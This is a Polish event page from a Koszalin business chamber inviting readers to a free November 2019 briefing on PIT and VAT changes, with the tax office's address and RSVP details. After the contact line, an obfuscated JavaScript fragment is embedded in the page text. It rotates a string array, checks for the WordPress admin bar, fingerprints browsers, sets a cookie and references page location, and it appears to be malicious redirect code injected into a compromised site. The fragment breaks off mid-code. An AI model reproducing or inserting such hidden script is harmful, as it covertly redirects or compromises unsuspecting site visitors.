Zmiany w zakresie PIT i VAT 2019/2020- szkolenie | Północna Izba Gospodarcza w Koszalinie

Naczelnik Pierwszego Urzędu Skarbowego w Koszalinie oraz Północna Izba Gospodarcza w Koszalinie serdecznie zaprasza na spotkanie informacyjne, które odbędzie się 19 listopada 2019 r. o godzinie 13:00,  w siedzibie Urzędu przy ul. Przemysłowej 3, sala konferencyjna (parter budynku).

Na spotkaniu zostaną omówione zmiany z dziedziny prawa podatkowego, które weszły w życie z dniem 1 września i 1 listopada, w zakresie podatku dochodowego PIT, podatku od towarów i usług VAT, jak również przybliżone zostaną zagadnienia ogólne związane z problematyką dostępności narzędzi ułatwiających kontakt z instytucjami publicznymi i załatwianiem spraw za pośrednictwem Internetu.

Spotkanie jest BEZPŁATNE, prosimy o potwierdzenie przybycia telefonicznie 733-837-300 lub mailowo koszalin@izba.info. 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m